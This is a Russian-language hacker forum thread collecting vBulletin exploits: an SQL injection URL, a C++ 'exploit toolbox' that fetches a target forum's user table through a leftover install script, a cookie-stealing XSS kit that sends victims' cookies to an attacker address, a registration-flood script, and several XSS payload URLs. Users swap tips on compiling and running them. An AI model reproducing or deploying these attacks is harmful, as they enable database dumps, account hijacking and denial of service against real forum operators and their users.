Уязвимости: vBulletin

[not null]

Vbulletin 2.X sql injection

global.php?templatesused=nn,dd,'))/*

=>

SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*',
'gobutton','timezone','username_loggedout',
'username_loggedin','phpinclude','headinclude',
'header','footer','forumjumpbit','forumjump',
'nav_linkoff','nav_linkon','navbar','nav_joiner',
'pagenav','pagenav_curpage','pagenav_firstlink',
'pagenav_lastlink','pagenav_nextlink','pagenav_pagelink',
'pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

 

[not null]

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#include <iostream>
using namespace std;

string exploit;
string answer;
string answer2;
long s;
sockaddr_in addr;
char IPaddr[1024];
/*You have to change to the right path*/
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";
char stry[41943040];
long I;
long M, J, K, L;
int i;

int main()
{
cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
cout << "> Press 1 for Install_path exploit" << endl;
cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
cout << "> Programm Author M4k3, www.pldsoft.com" << endl;
cout << "> Copyright by PLDsoft.com" << endl;
cout << "> Number? "; cin >> exploit;
cout << endl;

if (exploit == "1")
{
cout << " ____________________ " << endl;
cout << " |---PLDsoft.com------|" << endl;
cout << " |--------------------|" << endl;
cout << " |-vbulletin 3.5.4---|" << endl;
cout << " |install_path exploit|" << endl;
cout << " |____________________|" << endl;
cout << "##############################################" << endl;
cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
cout << "###############################################" << endl;
cout << endl;
cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl;
cout << "Remote : Yes" << endl;
cout << "Critical Level : Dangerous"<< endl;
cout << "############################################" << endl;
cout << "Affected software description :" << endl;
cout << endl;
cout << "Application : vbulletin" << endl;
cout << "version : latest version [ 3.60 Release 4 ]" << endl;
cout << "URL : http://www.vbulletin.com" << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Exploit:" << endl;
cout << endl;
cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylet
tersbutnotnumbers!]" << endl;
cout << endl;
cout << "when it works, you can download the database..." << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Contact:" << endl;
cout << "Nick: M4k3" << endl;
cout << "E-mail: m4k3 (at) pldsoft (dot) com [email concealed]" << endl;
cout << "Website: http://www.pldsoft.com" << endl;
cout << "_______End of Exploit______" << endl;
cout << endl;
sleep(1);
cout << "Use the exploit now?" << endl;
cout << "yes/no: "; cin >> answer;
}
if (answer == "yes")
{
cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
{
cout << "Insert IP: "; cin >> IPaddr;
M = 0;
J = 0;
K = 0;
L = 0;
while(IPaddr[i] != 0)
{
if(IPaddr[i] >= '0' && IPaddr[i] <= '9')
{
L *= 10;
L += IPaddr[i] - '0';
K++;
if(K > 3)
{
M = -1;
break;
}
}
else if(IPaddr[i] == '.')
{
if(K == 0)
{
M = -1;
break;
}
if(L >= 255)
{
M = -1;
break;
}
J++;
K = 0;
L = 0;
}
else
{
M = -1;
break;
}
M++;
}
if(M == -1 || J != 3)
{
cout << "> Invalid IP-Address!" << endl;
return 0;
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
addr.sin_family = AF_INET;
inet_aton(IPaddr, &addr.sin_addr);
addr.sin_port = htons(80);
if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in)))
{
printf("Failure: Connection Rested!\r\n");
close(s);
return 1;
}
if(send(s, sget, strlen(sget), 0) == 0)
{
printf("Failure: Not able to send packets!\r\n");
close(s);
return 2;
}

if((I = recv(s, stry, 41943040, 0)) == 0)
{
printf("Failure: Not able to receive packets!\r\n");
close(s);
return 3;

return 0;
}
close(s);
printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I);
printf("%s", stry);
return 0;
}
}

else if (exploit == "2")
{
cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl;
cout << "=> Author: SpiderZ"<< endl;
cout << "=> Sito: www.spiderz.tk"<< endl;
cout << endl;
cout << "_____________________________________________________________"<< endl;
cout << endl;
cout << "( 1 )"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl;
cout << "if(!empty($ip_adresse)) "<< endl;
cout << "{ "<< endl;
cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl;
cout << "} "<< endl;
cout << "else "<< endl;
cout << "{ "<< endl;
cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl;
cout << "} "<< endl;
cout << "?> "<< endl;
cout << endl;
cout << "<a href=""log.php""></a><?"<< endl;
cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl;
cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl;
cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl;
cout << "else $visitor_info = $REMOTE_HOST;"<< endl;
cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl;
cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl;
cout << "$x2=$REMOTE_PORT;"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$cookie = $_GET['c'];"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl;
cout << "$today = date(""l, F j, Y, g:i a"");"<< endl;
cout << "$subject = ""Xss Vbulletin"";"<< endl;
cout << "$message = ""Xss: Hacking"""<< endl;
cout << "Ip: $ip_adresse "<< endl;
cout << "Cookie: $cookie"<< endl;
cout << "Url: $base"<< endl;
cout << "porta usata: $xx1"<< endl;
cout << "remote port: $x2"<< endl;
cout << "Giorno & Ora : $today \n"<< endl;
cout << endl;
cout << "$from = ""From: $myemail\r\n"";"<< endl;
cout << "mail($myemail, $subject, $message, $from);"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << "( 2 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << "Name file: image.gif"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << endl;
cout << "<pre a='>' onmouseover='document.location=""http://YOUR ADDRESS WEB.com/exploit.php?"" "<< endl;
cout << "c=""+document.cookie' b='</pre' >"""<< endl;
cout << endl;
cout << endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << "location=""http://YOUR ADDRESS WEB.com"""<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << endl;
cout << "( 3 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << "Like Using"<< endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << "1 new thread"<< endl;
cout << "2 <a href=""http://YOUR ADDRESS WEB.com/IMAGE.GIF"" target=""_blank"">BEAUTIFUL GIRL</a>'"<< endl;
cout << "3 Submit"<< endl;
cout << "4 It waits for"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<<
endl;
cout << endl;
cout << endl;
cout << "# www.spiderz.tk " << endl;
cout << endl;
cout << "_______End of Exploit______" << endl;
}
else if (exploit == "3")
{
cout << "Script : vBulletin Version 3.5.4" << endl;
cout << endl;
cout << "site : www.vbulletin.com" << endl;
cout << endl;
cout << "Exploit by : x-boy" << endl;
cout << endl;
cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl;
cout << endl;
cout << "Type : Registration flood in register.php" << endl;
cout << endl;
cout << "Thanks to : Simo64" << endl;
cout << endl;
cout << endl;
cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl;
cout << endl;
cout << "cURL Must be activated (http://curl.haxx.se)" << endl;
cout << endl;
cout << "Sorry for my bad English :-)" << endl;
cout << endl;
cout << endl;
cout << "<?" << endl;
cout << endl;
cout << "set_time_limit(60);" << endl;
cout << endl;
cout << "//You can change 10 to other numbers" << endl;
cout << endl;
cout << "for($i = 1; $i <= 10; $i++)" << endl;
cout << endl;
cout << "{" << endl;
cout << endl;
cout << "//to put curl to send POST request" << endl;
cout << endl;
cout << "$ch = curl_init();" << endl;
cout << endl;
cout << "//change http://localhost/vb3 to the url of the script" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POST , 1);" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl;
cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md
5" << endl;
cout << "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password" << endl;
cout << "con" << endl;
cout << "firm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@g
m" << endl;
cout << "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST" << endl;
cout << "corrections always on&options[showemail]=1');" << endl;
cout << endl;
cout << "curl_exec($ch);" << endl;
cout << endl;
cout << "curl_close($ch);" << endl;
cout << endl;
cout << "}" << endl;
cout << endl;
cout << "//Flood finished good luck" << endl;
cout << endl;
cout << "?>" << endl;
cout << endl;
cout << "____End of Exploit___" << endl;
}
else
{
cout << "File not found / Failed to open file" << endl;
}

cout << endl;
cout << endl;
cout << endl;
cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl;
cout << "Contact m4k3@pldsecurity[dot]de" << endl;
return 0;
}

1. "Flaw" only affects pirated copies that have intentionally removed some security features. Nothing we can really do here when this happens

2. This is an IE exploit thats been fixed for well over a year where GIF files would be parsed as HTML.

3. Versions >= 3.6.0 by default have anti-robot registering enabled, all previous versions had to enable this manually.

 

[DeBugger]

Ниасилил.
Ребят, а что есть на воблу 3.6.2, если есть вообще?

 

[[br]]

not null
веселая вещь ) кто написал не в курсе ? .. проверил на старых версиях - ол ворк )

 

[Namelles One]

Чет нифига не смог скомпилить... ((

Ошибки какие-то наикривейшие прут... На .o файлы ссылаются... С фига бы...

 

[SHEFF]

я тоже не смог..мож чо не так делаю

 

[SilverT]

...ну не компилиться понятное дело - паблик сплойт, так и должно быть, а вообще это сборка из трех эксплойтов и первый из них давно здесь - Winux даже видео снял(когда не удалена папка инсталл на версии 3.5.4)...
...кстати, бага очень актуальна...

 

[DinamiC]

[br], выложи где-то скомпиленный файл пожалуйста. (линк в пм )

 

[SilverT]

выложи где-то скомпиленный файл пожалуйста

...да тут и компилить не надо - каждый из сплойтов можно выдрать поотдельности...

1: http://www.site.net/forum/install/upgrade....ep=somesite.net
...работает на нуленых движках - можно задампить sql базу...
...остальные сплойты сам выдерешь ...

 

[aka яП]

XSS в vBulletin 3.7.0

http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# XSS SCRIPT #
http://[website]/forums/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

 

[aka яП]

XSS в 3.7.1 3.6.10

http://[website]/[vB3]/[admincp]/index.php?redirect=dataext/html;base64,
PHNjcmlwdD5hbGVydCgnYWthIEdyZWF0Jyk8L3NjcmlwdD4=

http://[website]/[vB3]/[modcp]/index.php?redirect=dataext/html;base64,
PHNjcmlwdD5hbGVydCgnYWthIEdyZWF0Jyk8L3NjcmlwdD4=

XSS в ХАКЕ-vBanonymizer (v 2.7)

http://[website]/redirector.php?url=dataext/html;base64,
PHNjcmlwdD5hbGVydCgnYWthIEdyZWF0Jyk8L3NjcmlwdD4=

 

[aka яП]

XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

http://securityvulns.ru/Udocument137.html

язвимость существует из-за недостаточной обработки параметров "PHP_SELF" и "do" при запросе несуществующей страницы.

Exploit:

1) Оставляем в логах булки нашу хсс, используя данный эксплоит:

<html> <body> 
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" /> 
<img src="http://localhost/vB/upload/admincp/faq. php/1?do=*/a%3D'document.wri'/*" /> 
<img src="http://localhost/vB/upload/admincp/faq. php/2?do=*/b%3D'te(%22<script '/*" /> 
<img src="http://localhost/vB/upload/admincp/faq. php/3?do=*/c%3D'src=http://'/*" />
 <!--edit to match your data --> 
<img src="http://localhost/vB/upload/admincp/faq. php/4?do=*/d%3D'localhost/'/*"/> 
<img src="http://localhost/vB/upload/admincp/faq. php/5?do=*/e%3D''/*" /> 
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*"/> 
<!-- end edit --> 
<img src="http://localhost/vB/upload/admincp/faq. php/7?do=*/g%3D't>%22)'/*"/> 
<img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*"/> 
<img src="http://localhost/vB/upload/admincp/faq. php/9?do=*/eval(h)/*" /> 
<img src="http://localhost/vB/upload/admincp/faq. php/a0?do=*/</script>" /> 
</body> </html>

2) Затем отправьте админа по ссылке:
/adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1


Ограничения:
PHP_SELF - 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters

Также сообщается, что злоумышленник может внедрить и выполнить произвольный PHP код на системе с привилегиями Web сервера.

 

[aka яП]

vBulletin PhotoPost vBGallery v2.x Remote File Upload


http://milw0rm.com/exploits/6082